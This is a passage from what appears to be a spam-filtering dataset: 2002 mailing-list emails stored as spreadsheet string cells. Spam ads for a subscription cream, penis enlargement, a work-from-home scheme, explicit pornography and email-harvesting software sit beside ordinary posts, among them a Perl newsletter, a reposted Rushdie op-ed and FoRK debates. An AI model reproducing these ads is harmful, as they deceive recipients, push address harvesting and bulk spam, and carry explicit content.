   &lt;tr&gt; 
 	&lt;td height="214" width="345" valign="top"&gt; &lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;We'll 
 	  give you your first tube of Body Sculpture &lt;font color="#3165B8" size="4"&gt;FREE!! 
 	  &lt;/font&gt;&lt;br&gt;
 	  &lt;/font&gt;&lt;font size="2"&gt;Let us bill your credit card for $5.99 for shipping 
 	  and handling and we'll send you your first bottle of Body Sculpture free. 
 	  Four weeks after you place your order, your credit card will automatically 
 	  be billed for $22.95 plus $5.99 shipping and handling and your next bottle 
 	  of Body Sculpture will be sent to your mailing address!&lt;br&gt;
 	  &lt;font size="3"&gt;&lt;br&gt;
 	  &lt;/font&gt;
 	  &lt;div align="center"&gt;&lt;font size="5"&gt;&lt;a href="http://click.top-special-offers.com/cgi-bin/t.pl?id=10796:60763006"&gt;&lt;font size="4"&gt;Click 
 		Here!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
 	  &lt;/font&gt;&lt;/b&gt;&lt;/font&gt; &lt;/td&gt;
 	&lt;td rowspan="2" valign="top" width="111"&gt;&lt;a href="http://click.top-special-offers.com/cgi-bin/t.pl?id=10797:60763006"&gt;&lt;img src="http://easycream.com/creative/3.jpg" width="111" height="287" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
 	&lt;td valign="top" width="345"&gt;&lt;a href="http://click.top-special-offers.com/cgi-bin/t.pl?id=10798:60763006"&gt;&lt;img src="http://easycream.com/creative/4.jpg" width="345" height="73" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;IMG SRC="http://click.top-special-offers.com/cgi-bin/t.pl?id=10799:60763006&amp;o=1" BORDER=0 WIDTH=0 HEIGHT=0&gt; &lt;BR&gt;&lt;P&gt;&lt;BR&gt;&lt;!-- SKY-Email-Address: cypherpunks@einstein.ssz.com SKY-Database: top-special-offers --&gt;
 &lt;A name='unsub'&gt;&lt;TABLE align="center" border="0" cellpadding="5" cellspacing="0"&gt;&lt;TD&gt;&lt;TABLE width="600" align="center" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td height=1&gt;&lt;hr noshade&gt;&lt;/td&gt;&lt;/tr&gt;&lt;TR&gt;&lt;TD align="center"&gt;&lt;FONT color="black" size="2" face="arial,sans-serif"&gt;We respect your privacy. You have opted in to receive updates on the best discount offers while visiting one of our partner sites or an
 affiliate.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;!-- SKY-Email-Address: cypherpunks@einstein.ssz.com SKY-Database: top-special-offers --&gt;&lt;A name='unsub'&gt;	&lt;TABLE align="center" border="0" cellpadding="5" cellspacing="0"&gt;
 &lt;TD&gt;&lt;TABLE width="600" align="center" cellpadding="0" cellspacing="0" border="0"&gt;&lt;TR&gt;&lt;TD align="center"&gt;&lt;FONT color="black" size="2" face="arial,sans-serif"&gt;If you would no longer like to receive these offers via email, you can unsubscribe by sending a blank email to &lt;A href="mailto:unsub-60763006-1054@top-special-offers.com"&gt;unsub-60763006-1054@top-special-offers.com&lt;/A&gt;&lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD align="center"&gt;&lt;FONT size="2" face="arial,sans-serif"&gt;&lt;I&gt;OR&lt;/I&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;
 &lt;TD align="center"&gt;&lt;FONT face="arial,sans-serif" color="black" size="2"&gt;Sending a postal mail to CustomerService, Box 202885, Austin, TX 78720&lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD align="CENTER"&gt;&lt;BR&gt;&lt;FONT face="arial,sans-serif" size="2" color="black"&gt;&lt;I&gt;This message was sent to address cypherpunks@einstein.ssz.com&lt;/I&gt;&lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;tr&gt;&lt;td height=1&gt;&lt;hr noshade&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TABLE&gt;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</si>
  <si>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Quick, Outlaw Touching
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I know I heard of this a few years back but Wired and Slashyrot are both
 running stories on 10mbs data transfer via human touch.
 Oh I can see it now, The first bicostal file exchange system that will see
 the newsest Offspring tunes distribute by handshake, copulation and
 moshpiting.
 http://www.newscientist.com/news/news.jsp?id=ns99992891
 http://www.news.com.au/common/story_page/0,4057,5239758%255E13762,00.html
 http://slashdot.org/articles/02/10/07/0238234.shtml?tid=100
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Increase Length And Thickness          OCW
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;FONT SIZE=3D"4"&gt;&lt;B&gt; A man endowed with a 7-8" hammer is simply&lt;br&gt;
  better equipped than a man with a 5-6"hammer. &lt;BR&gt;
 &lt;BR&gt;Would you rather have&lt;br&gt;more than enough to get the job done or fall =
 short. It's totally up&lt;br&gt;to you. Our Methods are guaranteed to increase y=
 our size by 1-3"&lt;br&gt; &lt;A HREF=3D"http://209.163.187.47/cgi-bin/index.php?10=
 004"&gt;Come in here and see how&lt;/A&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Slaughter in the Name of God
</t>
  </si>
  <si>
    <t xml:space="preserve">An old Indian friend forwarded this to me a while ago.
 http://www.washingtonpost.com/ac2/wp-dyn?pagename=article&amp;node=&amp;contentId=A58173-2002Mar7&amp;notFound=true
 Slaughter in the Name of God
 By Salman Rushdie
 Friday, March 8, 2002; Page A33 Washington Post
 The defining image of the week, for me, is of a small child's burned and 
 blackened arm, its tiny fingers curled into a fist, protruding from the 
 remains of a human bonfire in Ahmadabad, Gujarat, in India. The murder 
 of children is something of an Indian specialty. The routine daily 
 killings of unwanted girl babies . . . the massacre of innocents in 
 Nellie, Assam, in the 1980s when village turned against neighboring 
 village . . . the massacre of Sikh children in Delhi during the 
 horrifying reprisal murders that followed Indira Gandhi's assassination: 
 They bear witness to our particular gift, always most dazzlingly in 
 evidence at times of religious unrest, for dousing our children in 
 kerosene and setting them alight, or cutting their throats, or 
 smothering them or just clubbing them to death with a good strong length 
 of wood.
 I say "our" because I write as an Indian man, born and bred, who loves 
 India deeply and knows that what one of us does today, any of us is 
 potentially capable of doing tomorrow. If I take pride in India's 
 strengths, then India's sins must be mine as well. Do I sound angry? 
 Good. Ashamed and disgusted? I certainly hope so. Because, as India 
 undergoes its worst bout of Hindu-Muslim bloodletting in more than a 
 decade, many people have not been sounding anything like angry, ashamed 
 or disgusted enough. Police chiefs have been excusing their men's 
 unwillingness to defend the citizens of India, without regard to 
 religion, by saying that these men have feelings too and are subject to 
 the same sentiments as the nation in general.
 Meanwhile, India's political masters have been tut-tutting and offering 
 the usual soothing lies about the situation being brought under control. 
 (It has escaped nobody's notice that the ruling party, the Bharatiya 
 Janata Party (BJP), or Indian People's Party, and the Hindu extremists 
 of the Vishwa Hindu Parishad (VHP), or World Hindu Council, are sister 
 organizations and offshoots of the same parent body.) Even some 
 international commentators, such as Britain's Independent newspaper, 
 urge us to "beware excess pessimism."
 The horrible truth about communal slaughter in India is that we're used 
 to it. It happens every so often; then it dies down. That's how life is, 
 folks. Most of the time India is the world's largest secular democracy; 
 and if, once in a while, it lets off a little crazy religious steam, we 
 mustn't let that distort the picture.
 Of course, there are political explanations. Ever since December 1992, 
 when a VHP mob demolished a 400-year-old Muslim mosque in Ayodhya, which 
 they claim was built on the sacred birthplace of the god Ram, Hindu 
 fanatics have been looking for this fight. The pity of it is that some 
 Muslims were ready to give it to them. Their murderous attack on the 
 train-load of VHP activists at Godhra (with its awful, atavistic echoes 
 of the killings of Hindus and Muslims by the train-load during the 
 partition riots of 1947) played right into the Hindu extremists' hands.
 The VHP has evidently tired of what it sees as the equivocations and 
 insufficient radicalism of India's BJP government. Prime Minister Atal 
 Bihari Vajpayee is more moderate than his party; he also heads a 
 coalition government and has been obliged to abandon much of the BJP's 
 more extreme Hindu nationalist rhetoric to hold the coalition together. 
 But it isn't working anymore. In state elections across the country, the 
 BJP is being trounced. This may have been the last straw for the VHP 
 firebrands. Why put up with the government's betrayal of their fascistic 
 agenda when that betrayal doesn't even result in electoral success?
 The electoral failure of the BJP is thus, in all probability, the spark 
 that lit the fire. The VHP is determined to build a Hindu temple on the 
 site of the demolished Ayodhya mosque -- that's where the Godhra dead 
 were coming from -- and there are, reprehensibly, idiotically, 
 tragically, Muslims in India equally determined to resist them. Vajpayee 
 has insisted that the slow Indian courts must decide the rights and 
 wrongs of the Ayodhya issue. The VHP is no longer prepared to wait.
 The distinguished Indian writer Mahasveta Devi, in a letter to India's 
 president, K. R. Narayanan, blames the Gujarat government (led by a BJP 
 hard-liner) as well as the central government for doing "too little too 
 late." She pins the blame firmly on the "motivated, well-planned out and 
 provocative actions" of the Hindu nationalists. But another writer, the 
 Nobel laureate V. S. Naipaul, speaking in India just a week before the 
 violence erupted, denounced India's Muslims en masse and praised the 
 nationalist movement.
 The murderers of Godhra must indeed be denounced, and Mahasveta Devi in 
 her letter demands "stern legal action" against them. But the VHP is 
 determined to destroy that secular democracy in which India takes such 
 public pride and which it does so little to protect; and by supporting 
 them, Naipaul makes himself a fellow traveler of fascism and disgraces 
 the Nobel award.
 The political discourse matters, and explains a good deal. But there's 
 something beneath it, something we don't want to look in the face: 
 namely, that in India, as elsewhere in our darkening world, religion is 
 the poison in the blood. Where religion intervenes, mere innocence is no 
 excuse. Yet we go on skating around this issue, speaking of religion in 
 the fashionable language of "respect." What is there to respect in any 
 of this, or in any of the crimes now being committed almost daily around 
 the world in religion's dreaded name? How well, with what fatal results, 
 religion erects totems, and how willing we are to kill for them! And 
 when we've done it often enough, the deadening of affect that results 
 makes it easier to do it again.
 So India's problem turns out to be the world's problem. What happened in 
 India has happened in God's name. The problem's name is God.
 Salman Rushdie is a novelist and author of the forthcoming essay 
 collection "Step Across This Line."
  2002 The Washington Post Company
 sdw
 -- 
 sdw@lig.net http://sdw.st
 Stephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622
 703-724-0118W 703-995-0407Fax Dec2001
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] The tenth planet
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Anyone know what Quaoar means or stands for? Can't find it in the
 &gt; dictionary. Scrabble players should be happy!
 &gt;
 http://www.angelfire.com/journal/cathbodua/Gods/Qgods.html
 Quaoar Their only god who 'came down from heaven; and, after reducing chaos
 to order, out the world on the back of seven giants. He then created the
 lower animals,' and then mankind. Los Angeles County Indians, California 
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Home Selling? Try Us!
 http://us.click.yahoo.com/QrPZMC/iTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">WE NEED HELP.  We are a 14 year old fortune 500 company, and we have 
 grown 1000%!  We cannot keep up.  We are looking for individuals who 
 want to work at home, and make a good living.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.lotsonet.com/opportunity
 and fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
 NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
 ONLY.
 http://www.lotsonet.com/opportunity
 You want to be independent?  THEN MAKE IT HAPPEN!
 HAPPEN!
 SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
 GUARANTEED!
 http://www.lotsonet.com/opportunity
 To be removed from our link simple go to:
 http://www.lotsonet.com/opportunity/remove.html
 3150uZPl9-590vitx5246frtb3-709rjXf0830sGEc0-646mzXg0950l52
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-10-01
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * This Week on perl5-porters (23-29 September 2002)
 +--------------------------------------------------------------------+
 | This Week on perl5-porters (23-29 September 2002)                  |
 |   posted by rafael on Monday September 30, @17:26 (summaries)      |
 |   http://use.perl.org/article.pl?sid=02/09/30/2151221              |
 +--------------------------------------------------------------------+
 This was a nice week, with lots of discussion, on various interesting
 topics. Read on for strange bugs, strange fixes, strange error messages,
 and as always, the ongoing efforts made to improve Perl 5.
 This story continues at:
     http://use.perl.org/article.pl?sid=02/09/30/2151221
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/30/2151221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</si>
  <si>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Why should I?  (:
 C
 On Fri, 6 Sep 2002, Geege Schuman wrote:
 &gt; quitcherbraggin.
 &gt; 
 &gt; :-)
 &gt; gg
 &gt; 
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 &gt; Sent: Friday, September 06, 2002 3:42 AM
 &gt; To: bitbitch@magnesium.net
 &gt; Cc: Adam L. Beberg; fork@example.com
 &gt; Subject: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 &gt; 
 &gt; 
 &gt; I dunno, BB.  Women who like to be thought of this way should have the
 &gt; right to choose to be treated this way.  Men too...  ahem.  (:  My boy
 &gt; cleans, washes clothes, cooks, fixes stuff, etc, and works the same number
 &gt; of hours I do, sometimes more, if he has to catch up with me.  (:  I
 &gt; close him because he is industrious and creative, and because he
 &gt; unfailingly makes my bed the minute I get out of it.  And boy #2 will be
 &gt; here soon to help boy #1 with other things such as pedicures,  backrubs,
 &gt; and sure, fucking.  LOL! (along with the aforementioned "chores") Adam can
 &gt; have his cake and eat it too, if he can only find the right girl who has
 &gt; the same beliefs about gender  roles that he has. Of course, he has NO
 &gt; clue where to look, so we will be constantly laughing at him while he
 &gt; stumbles around in the dark.
 &gt; Cindy
 &gt; P.S. the numbers do not in any way indicate importance or favor -- only
 &gt; the order in which they move into my house.  -smiles at chris-
 &gt; P.S. #2.  I'm moving.   Going to New Orleans.  Can't handle any more cab
 &gt; driving.  The summer sucked here on the MS Gulf Coast, instead of rocking
 &gt; like it normally does.  Wish me luck.  I'm going to look for another
 &gt; computer job.  Le Sigh.  (:
 &gt; 
 &gt; On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; 
 &gt; &gt; Hello Adam,
 &gt; &gt;
 &gt; &gt; Thursday, September 05, 2002, 11:33:18 PM, you wrote:
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; ALB&gt; So, you're saying that product bundling works? Good point.
 &gt; &gt;
 &gt; &gt; Sometimes I wish I was still in CA.  You deserve a good beating every
 &gt; &gt; so often...  (anyone else want to do the honors?)
 &gt; &gt;
 &gt; &gt; ALB&gt; And how is this any different from "normal" marriage exactly? Other
 &gt; then
 &gt; &gt; ALB&gt; that the woman not only gets a man, but one in a country where both
 &gt; she and
 &gt; &gt; ALB&gt; her offspring will have actual opportunities? Oh and the lack of
 &gt; &gt; ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded" choices?
 &gt; &gt;
 &gt; &gt; Mmkay.  For the nth time Adam, we don't live in the land of
 &gt; &gt; Adam-fantasy.  Women actually are allowed to do things productive,
 &gt; &gt; independent and entirely free of their male counterparts.  They aren't
 &gt; &gt; forced to cook and clean and merely be sexual vessels.   Sometimes,
 &gt; &gt; and this will come as a shock to you, no doubt, men and women even
 &gt; &gt; find -love- (which is the crucial distinction between this system) and
 &gt; &gt; they marry one another for the satisfaction of being together.   I
 &gt; &gt; know, far-fetched and idealistically crazy as it is, but such things
 &gt; &gt; do happen.   I can guarantee you, if my mother was approached by my
 &gt; &gt; father, and 25 years ago, he commented on her cleaning ability as a
 &gt; &gt; motivator for marrying her, we would not be having this conversation
 &gt; &gt; now.
 &gt; &gt;
 &gt; &gt; If guys still have silly antequated ideas about 'women's role' then
 &gt; &gt; their opportunities for finding women _will_ be scarce.   Again, these
 &gt; &gt; situations are great, provided everyone is aware that the relationship
 &gt; &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
 &gt; &gt; doesn't have to pay, and she wants a country that isn't impoverished
 &gt; &gt; and teeming with AIDS.  A contract, versus a true love-interest
 &gt; &gt; marriage.
 &gt; &gt;
 &gt; &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
 &gt; &gt; blame law school and my cat.
 &gt; &gt;
 &gt; &gt; -BB
 &gt; &gt;
 &gt; &gt; ALB&gt; - Adam L. "Duncan" Beberg
 &gt; &gt; ALB&gt;   http://www.mithral.com/~beberg/
 &gt; &gt; ALB&gt;   beberg@mithral.com
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; 
 &gt; --
 &gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear cpunks =2C
 =3CBODY bgColor=3D#ffccff=3E
 =3CTABLE border=3D0 cellPadding=3D0 cellSpacing=3D0 width=3D475=3E
   =3CTBODY=3E
   =3CTR=3E
     =3CTD align=3Dmiddle vAlign=3Dtop=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E=3CBR=3E
 =3CTABLE=3E
   =3CTBODY=3E
   =3CTR=3E
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E
     =3CTD bgColor=3D#b8ecff borderColor=3D#0000ff width=3D=2290%=22=3E=3CFONT color=3D#ff0000 
       face=3D=22Arial Black=22 
       size=3D6=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B Want   
       To Harvest A Lot Of Email&amp;nbsp=3B&amp;nbsp=3B Addresses In A Very Short Time=3F=3C=2FFONT=3E   
       =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial size=3D4=3EEasy Email   
       Searcher=3C=2FFONT=3E=3CFONT color=3D#ff00ff face=3DArial size=3D4=3E&amp;nbsp=3B is&amp;nbsp=3B   
       a&amp;nbsp=3B powerful&amp;nbsp=3B Email&amp;nbsp=3B software&amp;nbsp=3B&amp;nbsp=3B that&amp;nbsp=3B   
       harvests general Email lists from mail servers&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3CFONT   
       color=3D#0000ff face=3DArial size=3D4=3EEasy Email Searcher =3C=2FFONT=3E=3CFONT   
       color=3D#ff00ff face=3DArial size=3D4=3Ecan get 100=2C000 Email=3C=2FFONT=3E=3C=2FB=3E =3CFONT   
       color=3D#ff00ff face=3DArial size=3D4=3E=3CB=3Eaddresses directly from the Email   
       servers in only one hour!&amp;nbsp=3B=3C=2FB=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CUL=3E  
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E is a 32 bit Windows Program for e-mail marketing=2E It   
         is intended for easy and convenient search large e-mail address lists   
         from mail servers=2E The program can be operated on Windows 95=2F98=2FME=2F2000   
         and NT=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E =3C=2FB=3Esupport multi-threads =28up to 512   
         connections=29=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E has the ability&amp;nbsp=3B to reconnect to the mail   
         server if the server has disconnected and continue the searching at the   
         point where it has been interrupted=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E has an ergonomic interface that is easy to set up   
         and simple to use=2E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E  
       =3CP=3E=A1=A1=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3EEasy Email Searcher is an email   
       address searcher and bulk e-mail sender=2E It can verify more than 5500   
       email addresses per minute at only 56Kbps speed=2E It even allows you send   
       email to valid email address while searching=2E You can save the searching   
       progress and load it to resume work at your convenience=2E All you need to   
       do is just input an email address=2C and press the =22Search=22   
       button=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  
       =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3E=3CBR=3E=3C=2FFONT=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#FF00FF=22=3EVery 
       Low Price ! -------&amp;nbsp=3B Now=2C&amp;nbsp=3B The full version of Easy Email 
       Searcher only costs =3C=2Ffont=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#0000FF=22=3E$ 
       39=2E 95=3C=2Ffont=3E=3C=2FB=3E=3C=2FP=3E 
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CI=3EClick The Following Link To   
       Download The Demo =3A=3C=2FI=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E 
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA  
       href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=22=3EDownload Site   
       1=3C=2FA=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA   
       href=3D=22http=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=22=3EDownload Site   
       2=3C=2FA=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3C=2FB=3E=A1=A1=3CFONT color=3D#0000a0 face=3DArial 
       size=3D3=3E=3CSTRONG=3EIf&amp;nbsp=3B you can not download this program =2C&amp;nbsp=3B please   
       copy the following link into your URL =2C and then click =22 Enter=22 on your   
       Computer Keyboard=2E=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CP=3E=3CFONT size=3D2=3E=3CFONT color=3D#0000a0 face=3DArial size=3D3=3E=3CSTRONG=3EHere is the   
       download links=3A=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CDIV=3E  
       =3CP=3Ehttp=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=3C=2FP=3E  
       =3CP=3Ehttp=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=3C=2FP=3E=3C=2FFONT=3E=3C=2FDIV=3E  
       =3CP=3E=3C=2FP=3E=3C=2FTD=3E  
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E  
   =3CTR=3E  
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E  
     =3CTD bgColor=3D#0f95de width=3D=2290%=22=3E=3CFONT color=3D#ffffff   
       face=3D=22Verdana=2C Tahoma=2C Helvetica=2C SansSerif=22   
       size=3D1=3E=3CB=3EDisclaimer=3A=3C=2FB=3E=3CBR=3EWe are strongly against continuously sending   
       unsolicited emails to those who do not wish to receive our special   
       mailings=2E We have attained the services of an independent 3rd party to   
       overlook list management and removal services=2E This is not unsolicited   
       email=2E If you do not wish to receive further mailings=2C please click this   
       link =3CA href=3D=22 mailto=3Aremoval=40btamail=2Enet=2Ecn =22   
       target=3D=5Fblank=3E=3CFONT   
       color=3D#fdd32a=3E=3CB=3Emailto=3Aremoval=40btamail=2Enet=2Ecn  
       =3C=2FB=3E=3C=2FFONT=3E=3C=2FA=3E=2E&amp;nbsp=3B=3C=2FFONT=3E=3CB=3E=3CFONT class=3Ddisclaimer color=3D#000080  
       face=3DArial=3E=3CBR=3EThis message is a commercial advertisement=2E It is compliant  
       with all federal and state laws regarding email messages including the  
       California Business and Professions Code=2E We have provided the subject  
       line =22ADV=22 to provide you notification that this is a commercial  
       advertisement for persons over 18yrs old=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FTD=3E 
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E 
 =3CBR=3E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</si>
  <si>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On Tue, 2002-08-20 at 15:01, Ian Andrew Bell wrote:
 &gt; 
 &gt; Yet, despite all of this intense regulation and paper pushing, as 
 &gt; well as regulatory scrutiny by the FTC, SEC, and IRS, the 
 &gt; executives of Telecom Companies have managed to bilk the investment 
 &gt; community for what looks to be tens of billions of dollars.  
 This is a good thing.  Getting hammered for stupid investments is likely
 to result in smarter investments in the future.  Nobody is supposed to
 win all the time, particularly not people who don't do due diligence. 
 "A fool and his money are soon parted" and all that.  It isn't the job
 of the FTC/SEC/IRS/etc to make sure you invest your money wisely (and I
 have grave doubts that they could even if it was their job). 
 &gt; They 
 &gt; finished their routine with the a quadruple lutz -- laying off 
 &gt; hundreds of thousands of workers when it all came crashing down.
 So what?  Nobody is guaranteed employment.  Laying people off is not a
 crime nor is it immoral.  Companies don't exist to provide employment,
 nor should they.  The closest we have to such a thing in the US is a
 Government Job, and look at the quality THAT breeds.
 &gt; So.. tell me again.. how are we better off?
 Perhaps it is just a matter of personal preference, but I'd rather not
 live in a "feed lot" society, thank-you-very-much.
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: HARDCORE SEX &amp; ORGIES!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;HARDCORE SEX&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#000000"&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=550 align=center border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD align=middle colSpan=3&gt;
 &lt;A style="TEXT-DECORATION: none" href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;B&gt;&lt;FONT face=Tahoma color=#ffffcc size=6&gt;HOT GIRLS &lt;I&gt;&lt;FONT color=#ff0000&gt;FUCKING&lt;/FONT&gt;&lt;/I&gt;&amp;nbsp; HARD!!!&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;P&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD align=center&gt;
 &lt;A href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;IMG src="http://195.235.97.200/personal9/justporno/b1.jpg" width=130 height=150 border=0&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;B&gt;&lt;FONT face=Arial color=#ffffff size=1&gt;&amp;lt;&amp;lt; &lt;/FONT&gt;&lt;A style="TEXT-DECORATION: none" href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;FONT face=Verdana color=#00ff00 size=1&gt;click here to see&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=Arial color=#ffffff size=1&gt; &amp;gt;&amp;gt;&lt;/FONT&gt;&lt;/B&gt;&lt;P&gt;
 &lt;A href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;IMG src="http://195.235.97.200/personal9/justporno/b2.jpg" width=130 height=150 border=0&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;B&gt;&lt;FONT face=Arial color=#ffffff size=1&gt;&amp;lt;&amp;lt; &lt;/FONT&gt;&lt;A style="TEXT-DECORATION: none" href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;FONT face=Verdana color=#00ff00 size=1&gt;click here to see&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=Arial color=#ffffff size=1&gt; &amp;gt;&amp;gt;&lt;/FONT&gt;&lt;/B&gt;&lt;P&gt;
 &lt;A href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;IMG src="http://195.235.97.200/personal9/justporno/b3.jpg" width=130 height=150 border=0&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;B&gt;&lt;FONT face=Arial color=#ffffff size=1&gt;&amp;lt;&amp;lt; &lt;/FONT&gt;&lt;A style="TEXT-DECORATION: none" href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;FONT face=Verdana color=#00ff00 size=1&gt;click here to see&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=Arial color=#ffffff size=1&gt; &amp;gt;&amp;gt;&lt;/FONT&gt;&lt;/B&gt;&lt;br&gt;
 &lt;/TD&gt;
 &lt;TD&gt;
 &lt;DIV align=center&gt;
 	&lt;TABLE borderColor=#ffffff cellPadding=0 width=250 border=1&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;
     &lt;TD bgColor=#ffcc66&gt;
